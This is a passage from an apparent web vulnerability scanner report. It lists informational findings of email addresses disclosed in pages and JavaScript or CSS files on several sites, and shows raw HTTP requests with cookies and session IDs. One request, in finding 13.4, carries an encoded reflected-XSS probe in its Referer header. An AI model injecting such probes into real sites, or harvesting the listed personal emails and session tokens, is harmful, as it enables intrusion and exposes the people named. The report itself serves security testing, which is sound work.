Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; __utma=267740763.847546434.1315849637.1315849637.1315849637.1; __utmb=267740763.22.10.1315849637; __utmc=267740763; __utmz=267740763.1315849637.1.1.utmcsr=ciphertex.com|utmccn=(referral)|utmcmd=referral|utmcct=/content/contact; __utmv=267740763.anonymous%20user

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
Last-Modified: Mon, 12 Sep 2011 12:58:08 +0000
Cache-Control: public, max-age=60
ETag: "1315832288-1"
Set-Cookie: SESS797294cd3a93256631fb852630ae867a=deleted; expires=Sun, 12-Sep-2010 12:58:07 GMT; path=/; domain=.drupal.org; httponly
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Vary: Cookie,Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 19351
Date: Mon, 12 Sep 2011 12:58:08 GMT
X-Varnish: 550052613
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache-Svr: www6.drupal.org
X-Cache: MISS

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-T
...[SNIP]...
<a href="mailto:security@drupal.org" rel="nofollow">security@drupal.org</a>
...[SNIP]...
13.2. http://drupal.org/search/apachesolr_multisitesearch/xss%20sql%20injection  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drupal.org
Path:   /search/apachesolr_multisitesearch/xss%20sql%20injection

Issue detail

The following email address was disclosed in the response:

Request

GET /search/apachesolr_multisitesearch/xss%20sql%20injection HTTP/1.1
Host: drupal.org
Proxy-Connection: keep-alive
Referer: http://drupal.org/security
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; __utma=267740763.847546434.1315849637.1315849637.1315849637.1; __utmb=267740763.12.10.1315849637; __utmc=267740763; __utmz=267740763.1315849637.1.1.utmcsr=ciphertex.com|utmccn=(referral)|utmcmd=referral|utmcct=/content/contact; __utmv=267740763.anonymous%20user

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
Last-Modified: Mon, 12 Sep 2011 12:57:47 +0000
Cache-Control: public, max-age=60
ETag: "1315832267-1"
Set-Cookie: SESS797294cd3a93256631fb852630ae867a=deleted; expires=Sun, 12-Sep-2010 12:57:46 GMT; path=/; domain=.drupal.org; httponly
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Vary: Cookie,Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 36490
Date: Mon, 12 Sep 2011 12:57:47 GMT
X-Varnish: 1469471826
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache-Svr: www5.drupal.org
X-Cache: MISS

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-T
...[SNIP]...
<a href="/user/227" title="View user profile.">killes@www.drop.org</a>
...[SNIP]...
13.3. http://drupal.org/security-team  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drupal.org
Path:   /security-team

Issue detail

The following email address was disclosed in the response:

Request

GET /security-team HTTP/1.1
Host: drupal.org
Proxy-Connection: keep-alive
Referer: http://drupal.org/security
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; __utma=267740763.847546434.1315849637.1315849637.1315849637.1; __utmb=267740763.20.10.1315849637; __utmc=267740763; __utmz=267740763.1315849637.1.1.utmcsr=ciphertex.com|utmccn=(referral)|utmcmd=referral|utmcct=/content/contact; __utmv=267740763.anonymous%20user

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
Last-Modified: Mon, 12 Sep 2011 12:57:59 +0000
Cache-Control: public, max-age=60
ETag: "1315832279-1"
Set-Cookie: SESS797294cd3a93256631fb852630ae867a=deleted; expires=Sun, 12-Sep-2010 12:57:58 GMT; path=/; domain=.drupal.org; httponly
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Vary: Cookie,Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 20663
Date: Mon, 12 Sep 2011 12:57:59 GMT
X-Varnish: 550052168
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache-Svr: www6.drupal.org
X-Cache: MISS

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-T
...[SNIP]...
<a href="mailto:security@drupal.org" rel="nofollow">security@drupal.org</a>
...[SNIP]...
<a href="mailto:security@drupal.org" rel="nofollow">security@drupal.org</a>
...[SNIP]...
13.4. http://media26.onsugar.com/v645/static/js/scriptaculous-1.8.3/controls.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media26.onsugar.com
Path:   /v645/static/js/scriptaculous-1.8.3/controls.js

Issue detail

The following email address was disclosed in the response:

Request

GET /v645/static/js/scriptaculous-1.8.3/controls.js HTTP/1.1
Host: media26.onsugar.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36?nids[]=1922398&p=

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Accept-Ranges: bytes
Last-Modified: Thu, 11 Mar 2010 21:20:10 GMT
Server: lighttpd/1.4.26
Vary: Accept-Encoding
Content-Length: 34787
Cache-Control: max-age=1209600
Date: Mon, 12 Sep 2011 13:03:50 GMT
Connection: close

// script.aculo.us controls.js v1.8.3, Thu Oct 08 11:23:33 +0200 2009

// Copyright (c) 2005-2009 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005-2009 Ivan Krstic (htt
...[SNIP]...
<tdd@tddsworld.com>
...[SNIP]...
13.5. http://mydirtbike.com/sites/all/libraries/colorbox/colorbox/jquery.colorbox-min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mydirtbike.com
Path:   /sites/all/libraries/colorbox/colorbox/jquery.colorbox-min.js

Issue detail

The following email address was disclosed in the response:

Request

GET /sites/all/libraries/colorbox/colorbox/jquery.colorbox-min.js?Y HTTP/1.1
Host: mydirtbike.com
Proxy-Connection: keep-alive
Referer: http://mydirtbike.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS430a6cc0ebd5514ad5b74d956bca3e8e=sbcql40odpvg8rtdlc43igs7a2

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:49:00 GMT
Server: Apache/2.2.17 (Ubuntu)
Last-Modified: Tue, 26 Apr 2011 09:46:07 GMT
ETag: "1d20410-2444-4a1cf317df022"
Accept-Ranges: bytes
Cache-Control: max-age=1209600
Expires: Mon, 26 Sep 2011 12:49:00 GMT
Vary: Accept-Encoding
Content-Length: 9284
Content-Type: application/javascript

// ColorBox v1.3.16 - a full featured, light-weight, customizable lightbox based on jQuery 1.3+
// Copyright (c) 2011 Jack Moore - jack@colorpowered.com
// Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
(function(a,b,c){function ba(b){if(!T){O=b,Z(a.extend(J,a.data(O,e))),x=a(O),P=0,J.rel!=="nofollow"&&(x=a("."+V)
...[SNIP]...
13.6. http://research.yahoo.com/themes/yresearch/style-1.1.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://research.yahoo.com
Path:   /themes/yresearch/style-1.1.css

Issue detail

The following email address was disclosed in the response:

Request

GET /themes/yresearch/style-1.1.css HTTP/1.1
Host: research.yahoo.com
Proxy-Connection: keep-alive
Referer: http://research.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=016e3b4e6615bdb5; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160; AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; ydrupal=5ef1f7cc0e5b3a853c4b1d0deaa44289

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:27 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Last-Modified: Wed, 11 Nov 2009 23:10:03 GMT
Accept-Ranges: bytes
Cache-Control: private
Connection: close
Content-Type: text/css
Content-Length: 20524

/* Yahoo! Research Style Sheet - Pras Sarkar: psarkar@yahoo-inc.com */

BODY                {
font-family            :arial,helvetica,sans-serif;
background-color    :#eeeef4;
background-image    :url(images/mainBg.gif);
background-repeat    :repeat-x;
margin                :0px;
padding                :0px;
/*h
...[SNIP]...
13.7. http://research.yahoo.com/themes/yresearch/style_drupal.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://research.yahoo.com
Path:   /themes/yresearch/style_drupal.css

Issue detail

The following email address was disclosed in the response:

Request

GET /themes/yresearch/style_drupal.css HTTP/1.1
Host: research.yahoo.com
Proxy-Connection: keep-alive
Referer: http://research.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=016e3b4e6615bdb5; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160; AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; ydrupal=5ef1f7cc0e5b3a853c4b1d0deaa44289

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:27 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Last-Modified: Thu, 23 Jul 2009 21:26:18 GMT
Accept-Ranges: bytes
Cache-Control: private
Connection: close
Content-Type: text/css
Content-Length: 3585

/* Yahoo! Research Style Sheet - Pras Sarkar: psarkar@yahoo-inc.com */

h1, h2, h3, h4, h5, h6 {
   font-family:Tahoma, Helvetica,Arial,sans-serif;
   font-weight:normal;
   margin:0pt;
   padding:0pt;
}
h1 {
   color:#4B546F;
   font-size:15px;
   font-weight:bold;
   margin:0 0 10p
...[SNIP]...
13.8. http://research.yahoo.com/themes/yresearch/style_edits-1.4.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://research.yahoo.com
Path:   /themes/yresearch/style_edits-1.4.css

Issue detail

The following email address was disclosed in the response:

Request

GET /themes/yresearch/style_edits-1.4.css HTTP/1.1
Host: research.yahoo.com
Proxy-Connection: keep-alive
Referer: http://research.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=016e3b4e6615bdb5; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160; AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; ydrupal=5ef1f7cc0e5b3a853c4b1d0deaa44289

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:27 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Last-Modified: Thu, 03 Jun 2010 20:42:07 GMT
Accept-Ranges: bytes
Cache-Control: private
Connection: close
Content-Type: text/css
Content-Length: 27400

/* Yahoo! Research Style Sheet - Pras Sarkar: psarkar@yahoo-inc.com */

body {
/*    background-color: #fff; */
   background-color: #EEEEF4;
   background-image: url(images/mainBg.gif);
   background-repeat: repeat-x;
}

#doc2 {
   margin:auto;text-align:left;
   width:73.84em/*
...[SNIP]...
13.9. http://savannahnow.com/sites/default/files/js/js_20f1b99cfdc38a8ea7818ec0c877dbfe.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://savannahnow.com
Path:   /sites/default/files/js/js_20f1b99cfdc38a8ea7818ec0c877dbfe.js

Issue detail

The following email address was disclosed in the response:

Request

GET /sites/default/files/js/js_20f1b99cfdc38a8ea7818ec0c877dbfe.js HTTP/1.1
Host: savannahnow.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Mon, 12 Sep 2011 08:31:17 GMT
Server: Apache
Last-Modified: Mon, 12 Sep 2011 03:46:25 GMT
ETag: "49c2-4acb65f048640"-gzip
Accept-Ranges: bytes
Cache-Control: max-age=1209600
Expires: Mon, 26 Sep 2011 08:31:17 GMT
Vary: Accept-Encoding
Content-Length: 18882
Content-Type: application/x-javascript
Age: 15421
X-Cache: HIT from sms4.morris.com
X-Cache-Lookup: HIT from sms4.morris.com:3128
Connection: keep-alive


var s_account=omni_account
var s=s_gi(s_account)
s.charSet="ISO-8859-1"
s.currencyCode="USD"
s.trackDownloadLinks=true
s.trackExternalLinks=true
s.trackInlineStats=true
s.linkDownloadFileTypes="exe,z
...[SNIP]...
7=s.mr($C,(vt@tt`Zvt)`fs.hav()+q+(qs?qs:s.rq(^5)),0,id,ta);qs`g;"
+"`Rm('t')`5s.p_r)s.p_r(`I`a`g}^I(qs);^Q`u($3;`j$3`c^1,`G$O1',vb`I@M=^G=s.`Q`r=s.`Q^2=`H`m`g`5s.pg)`H^w@M=`H^weo=`H^w`Q`r=`H^w`Q^2`g`5!id@Vs.tc^ztc=1;s.flush`U()}`4#7`Ctl`0o,t,n,vo`2;s.@M=$Go`I`Q^2=t"
+";s.`Q`r=n;s.t($3}`5pg){`H^wco`0o){`P^s\"_\",1,$8`4$Go)`Cwd^wgs`0u@v`P^sun,1,$8`4s.t()`Cwd^wdc`0u@v`P^sun,$8`4s.t()}}@8=(`H`M`k`9`3'@Os^y0`Id=
...[SNIP]...
13.10. http://static.nowpublic.net/sf_js/core_bc99f0856175_190.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.nowpublic.net
Path:   /sf_js/core_bc99f0856175_190.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /sf_js/core_bc99f0856175_190.js HTTP/1.1
Host: static.nowpublic.net
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:15 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n59 ( lax-agg-n46), ht lax-agg-n46.panthercdn.com
Cache-Control: max-age=31536000
Expires: Mon, 27 Aug 2012 00:13:44 GMT
Age: 1341271
Content-Length: 240302
Content-Type: application/x-javascript
Vary: Accept-Encoding
Last-Modified: Mon, 27 Dec 2010 13:30:55 GMT
Connection: keep-alive

(function(){
/*
* jQuery 1.2.6 - New Wave Javascript
*
* Copyright (c) 2008 John Resig (jquery.com)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* $Da
...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
var expires = '';
if (o
...[SNIP]...
]);
return fn.apply(scope, params);
};
};
}

if (Drupal.jsEnabled) {
// Initialize all functionality.
$(function() { Drupal.attachBehaviors(); });
}
;/* Copyright (c) 2007 Paul Bakaus (paul.bakaus@googlemail.com) and Brandon Aaron (brandon.aaron@gmail.com || http://brandonaaron.net)
* Dual licensed under the MIT (http://www.opensource.org/licenses/mit-license.php)
* and GPL (http://www.opensource.org/licenses/gpl-license.php) licenses.
*
* $LastCha
...[SNIP]...
ooltip_objects[id].ft = (b_action == 'add') ? 'Remove' : 'Add';
return false;
}
}
return true;
}
};;/*
* jQuery UI Effects 1.5
*
* Copyright (c) 2008 Aaron Eisenberger (aaronchi@gmail.com)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* http://docs.jquery.com/UI/Effects/
*
*/
;(function($) {

$.effects = $.effects || {}; //Add t
...[SNIP]...
13.11. http://static.nowpublic.net/sf_js/fp_9668f20645c9_190.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.nowpublic.net
Path:   /sf_js/fp_9668f20645c9_190.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /sf_js/fp_9668f20645c9_190.js HTTP/1.1
Host: static.nowpublic.net
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:15 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n59 ( lax-agg-n15), ht lax-agg-n15.panthercdn.com
Cache-Control: max-age=31536000
Expires: Thu, 26 Apr 2012 02:11:36 GMT
Age: 11961399
Content-Length: 105993
Content-Type: application/x-javascript
Vary: Accept-Encoding
Last-Modified: Mon, 27 Dec 2010 13:30:55 GMT
Connection: keep-alive

/**
* jQuery.ScrollTo
* Copyright (c) 2007-2008 Ariel Flesler - aflesler(at)gmail(dot)com | http://flesler.blogspot.com
* Dual licensed under MIT and GPL.
* Date: 9/11/2008
*
* @projectDes
...[SNIP]...
<stanlemon@mac.com>
...[SNIP]...
.apply(this, [value]);

return r;
};

})((typeof NowPublicScan == 'object' && NowPublicScan.jQuery) || jQuery);
;/**
*
* jquery.sparkline.js
*
* v1.4.2
* (c) Splunk, Inc
* Contact: Gareth Watts (gareth@splunk.com)
* http://omnipotent.net/jquery.sparkline/
*
* Generates inline sparkline charts from data supplied either to the method
* or inline in HTML
*
* Compatible with Internet Explorer 6.0+ and modern brows
...[SNIP]...
13.12. http://video.fastcompany.com/companies/mansueto-digital/videos.rss  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://video.fastcompany.com
Path:   /companies/mansueto-digital/videos.rss

Issue detail

The following email address was disclosed in the response:

Request

GET /companies/mansueto-digital/videos.rss?ids=35a3467f31b51,5a74966232a47,1bc51eb069eb1,29b58b01bf488,79b00a7ba65dd,273bd40607339&append_image_to_description=false&verbosity=low&p=fc_playlist_homepage&template_ids=rtmp_only%2Cflowplayer%2Cflowplayer_bwcheck&assets=dynamic_stream_switching_capable&append_image_to_description=false&still_frame_height=180 HTTP/1.1
Host: video.fastcompany.com
Proxy-Connection: keep-alive
Referer: http://video.fastcompany.com/plugins/player.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1603584230-1315849705375

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:10 GMT
Server: VoxCAST
Vary: Accept-Encoding
Cache-Control: max-age=900
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Status: 304
X-Runtime: 650
ETag: "ce4c2af2fcfc05fada03d16a43404a9c"
X-XML-Template: rtmp_only,flowplayer,flowplayer_bwcheck
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
X-Cache: HIT from VoxCAST
Age: 800
Content-Length: 15582
Content-Type: application/rss+xml; charset=utf-8

<?xml version="1.0"?>
<rss xmlns:media="http://search.yahoo.com/mrss/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:custom-field="http://service.twistage.com/custom_field_definitions" version="2.0">
...[SNIP]...
<media:credit role="uploader" scheme="urn:yvs">adam.barenblat@gmail.com</media:credit>
...[SNIP]...
<media:credit role="uploader" scheme="urn:yvs">adam.barenblat@gmail.com</media:credit>
...[SNIP]...
<media:credit role="uploader" scheme="urn:yvs">adam.barenblat@gmail.com</media:credit>
...[SNIP]...
<media:credit role="uploader" scheme="urn:yvs">adam.barenblat@gmail.com</media:credit>
...[SNIP]...
<media:credit role="uploader" scheme="urn:yvs">adam.barenblat@gmail.com</media:credit>
...[SNIP]...
<media:credit role="uploader" scheme="urn:yvs">adam.barenblat@gmail.com</media:credit>
...[SNIP]...
13.13. http://w.sharethis.com/button/buttons.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://w.sharethis.com
Path:   /button/buttons.js

Issue detail

The following email address was disclosed in the response:

Request

GET /button/buttons.js HTTP/1.1
Host: w.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.dome9.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CqCKBE5ezzUzVT7FCnHuAg==

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
Expires: Tue, 13 Sep 2011 12:03:16 GMT
Cache-Control: max-age=86400
Content-Length: 58953
Date: Mon, 12 Sep 2011 12:40:45 GMT
Connection: close
Vary: Accept-Encoding

var cookie=new function(){return{setCookie:function(d,f,h){if(h){var c=new Date();c.setTime(c.getTime()+(h*24*60*60*1000));var a="; expires="+c.toGMTString()}else{var a=""}var b=d+"="+escape(f)+a;var
...[SNIP]...
rn false}stLight.processSTQ();stLight.readyRun=true;if(stLight.publisher==null){if(typeof(window.console)!=="undefined"){try{console.debug("Please specify a ShareThis Publisher Key \nFor help, contact support@sharethis.com")}catch(a){}}}var b=stLight.getSource();stLight.log("pview",b,"");stWidget.options.sessionID=stLight.sessionID;stWidget.options.fpc=stLight.fpc;stLight.loadServicesLoggedIn(function(){stButtons.onRead
...[SNIP]...
13.14. http://www.cargoh.com/sites/default/files/js/js_8a98a7cc05aa129e3debc64b291aa431.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cargoh.com
Path:   /sites/default/files/js/js_8a98a7cc05aa129e3debc64b291aa431.js

Issue detail

The following email address was disclosed in the response:

Request

GET /sites/default/files/js/js_8a98a7cc05aa129e3debc64b291aa431.js HTTP/1.1
Host: www.cargoh.com
Proxy-Connection: keep-alive
Referer: http://www.cargoh.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Sun, 11 Sep 2011 12:45:31 GMT
ETag: "11ac006-df9a9-4aca9c925f0c0"
Cache-Control: max-age=1209600
Expires: Mon, 26 Sep 2011 10:58:36 GMT
Vary: Accept-Encoding
Content-Type: application/javascript
Content-Length: 915881
Date: Mon, 12 Sep 2011 12:48:37 GMT
X-Varnish: 1072006033 1071999763
Age: 6601
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: HIT

// $Id: jquery.js,v 1.12.2.3 2008/06/25 09:38:39 goba Exp $

/*
* jQuery 1.2.6 - New Wave Javascript
*
* Copyright (c) 2008 John Resig (jquery.com)
* Dual licensed under the MIT (MIT-LICENSE.txt)
...[SNIP]...
<brian@cherne.net>
...[SNIP]...
13.15. http://www.mtv.co.uk/misc/jquery-ui.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /misc/jquery-ui.min.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /misc/jquery-ui.min.js HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 24 Feb 2009 10:05:20 GMT
ETag: "2c623-44892-41b65800"
Accept-Ranges: bytes
Debug: lnioxp006wuk
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 280722
Cache-Control: max-age=593639
Expires: Mon, 19 Sep 2011 09:42:43 GMT
Date: Mon, 12 Sep 2011 12:48:44 GMT
Connection: close

/*
* jQuery UI 1.5.3
*
* Copyright (c) 2008 Paul Bakaus (ui.jquery.com)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* http://docs.jquery.com/U
...[SNIP]...
rabanski
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* http://docs.jquery.com/UI/Datepicker
*
* Depends:
*    ui.core.js
*
* Marc Grabanski (m@marcgrabanski.com) and Keith Wood (kbwood@virginbroadband.com.au).
*/

(function($) { // hide the namespace

var PROP_NAME = 'datepicker';

/* Date picker manager.
Use the singleton instance of this class, $.datepicker, to interact with the date pick
...[SNIP]...
ion() {
   $(document.body).append($.datepicker.dpDiv).
       mousedown($.datepicker._checkExternalClick);
});

})(jQuery);
/*
* jQuery UI Effects 1.5.3
*
* Copyright (c) 2008 Aaron Eisenberger (aaronchi@gmail.com)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* http://docs.jquery.com/UI/Effects/
*/
;(function($) {

$.effects = $.effects || {}; //Add the '
...[SNIP]...
ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
